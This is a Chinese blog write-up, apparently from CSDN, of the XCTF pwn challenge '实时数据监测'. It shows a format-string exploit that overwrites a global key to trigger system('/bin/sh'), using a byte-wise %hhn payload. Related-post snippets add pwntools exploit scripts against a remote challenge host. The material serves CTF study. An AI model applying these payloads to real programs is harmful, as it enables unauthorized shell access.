实时数据监测(xctf)

最新推荐文章于 2022-08-29 17:32:25 发布
最新推荐文章于 2022-08-29 17:32:25 发布
阅读量883 收藏 1
点赞数 1
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/106320474
版权
本文详细介绍了XCTF中程序保护和流程,重点在于如何利用程序的流程来触发关键行为。通过分析,我们发现当key值为0x2223322时,会调用`system("/bin/sh")`。同时,`imagemagic()`函数存在格式化字符串漏洞。为了安全地修改key值,避免输入缓冲区溢出,采取了逐字节写入的策略,构建了特定的payload来实现目标。此外,还提供了exploit的相关思路。
摘要由CSDN通过智能技术生成

0x0 程序保护和流程

保护:

在这里插入图片描述

流程:

main()

在这里插入图片描述

locker()

在这里插入图片描述

imagemagic()

在这里插入图片描述

当key=35795746=0x2223322时调用system("/bin/sh"),在imagemagic()中又存在格式化字符串漏洞。所以只需要更改key的值即可。

在这里插入图片描述

0x1 利用过程

先确定偏移量。

在这里插入图片描述

偏移量为12。但是我们要向key的地址写入35795746=0x2223322,如果一次性写入35795746个字符的话输入缓冲区可能会溢出导致程序无法运行。所以我们选择单字符写入所以payload=p32(0x0804A048)+p32(0x0804A049)+p32(0x0804A04A)+p32(0x0804A04B)+"%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn" (数据在内存中是小端序%hhn会写入单字节)

\x22=34  		\x33=51  		\x22=34           \x02=2
18+16=34=0x22   34+17=51=0x33   51+239=290=0x122  290+224=514=0x202

也可以使用模板

def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result
最低0.47元/天 解锁文章
whiteh4nd
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据监控难点之实时监测
kongjiazhanshi的博客
06-01 570
品牌商必须要做好对商品价格动态变化的实时监控,在365天里,24小时中,不定时地选取最合适的时机进行监测
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1290
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 624
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
[XCTF-pwn] 4-实时数据监测
weixin_52640415的博客
03-03 191
格式化字符串漏洞,在指定位置写入指定值 from pwn import * p = remote('111.200.241.244', 59708) context(arch='i386', log_level='debug') p.sendline(fmtstr_payload(12, {0x0804A048 : 35795746})) p.interactive()
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1104
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
xctf部分题目
keaixiaohan的博客
09-24 355
xctf部分题目 ​ 一、CandyShop 通过观察页面发现了帐号登录功能,尝试sql注入与xss无果,,尝试注册帐号,可以注册帐号,但所有帐号均未激活,通过审计源码(这里先通过工具seay审计,但是seay只能找出可能存在漏洞的函数,对于这种题目而言,只能通过人工审计。),发现了一个已经激活的帐号,但是无密码。 let users = client.db('test').collection('users') users.deleteMany(err => { if (...
xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“
njh18790816639的博客
07-31 339
反应釜开关控制 该pwn题目逻辑较为简单。 通过三次栈溢出,可以得到shell函数地址。 发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂! 这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。 分界线 这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。 实时数据监测 发现什么保护都没有
xctf 实时数据监测
Tw0的博客
10-14 1730
练习记录 一道简单的格式化字符串漏洞题目,题目所有的保护都没有开。easy,但是还是花了我好久来复习,毕竟时间长了,格式化字符串的学习都快忘记了。 总结: 1、用gdb来查看的偏移地址中,左边的是低地址的内容,右边是高地址的内容。 再后面的22就是0x804a048地址中的内容,而02就是0x804a04b地址中的内容了。 2、ida中反汇编出来的数值和gdb中看到的是一样的。都是小端序排列的数据。 3、存入地址中是以十六进制存储的,所以22代表前面输出过34个字节的数据了...
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 588
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2933
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
攻防世界 pwn--实时数据检测
YANG12345_6的博客
11-30 292
32位程序 保护都没有开 直接拖进ida分析 int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); // 含printf函数,有格式化字符串漏洞 if ( key == 0x2223322 ) // key在bs
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1199
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
智慧地铁三维可视化数据监测管理平台实时感知车辆运行状态
VRARvrnew3d的博客
08-29 827
三维可视化地理空间场景融合周界、入侵、门禁等多种告警业务数据,实现基于大场景精准空间位置的分析、告警及联动应用,解决区域显示不直观、不精准等问题,提升数据价值。
ADworld pwn wp - 实时数据监测
fa1c4的blog
06-28 171
格式化漏洞, 可以考虑任意地址读写, 将key修改为35795746, get shell 格式化字符串的第12个参数开始泄露, 并且key的位置是0x0804a048, 所以可以将该位置写为35795746 == 0x02223322, 按双字节写入 0x0222 = 546 0x3322 = 13090 546 - 8 = 538 13090 - 546 = 12544 payload = p32(key_addr + 2) + p32(key_addr) + b"%538c%12$hn" + ...
XCTF(攻防世界)
qq_63685461的博客
12-02 808
1.this_is_flag 属于是介绍flag长啥样子了 2.pdf 下载附件 啥也没有 pdf格式的尝试转为word 3.如来十三掌 下载附件一个word文档 看这格式一个佛曰加密得到MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9 试了base没用,想不到了就查了一下这个是rot-13加密 得到一串base加密字符串解密得到flag flag{bdscjhbkzmnfrdhbvckijndskvbkjdsab} 4....
XCTF Hello CTF
YenKoc的博客
01-15 1025
一.查壳 二.拖入ida x86静态分析 shift +F12找到字符串。 发现关键字please input your serial 点击进入 这是我们的主函数,F5反编译一下,看一下逻辑。 这里有几个函数,我也不懂啥意思,百度的. 1.qmemcpy(void *destin ,void *source):将source指针所指的值拷贝到destin中去 2.sprintf(char ...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值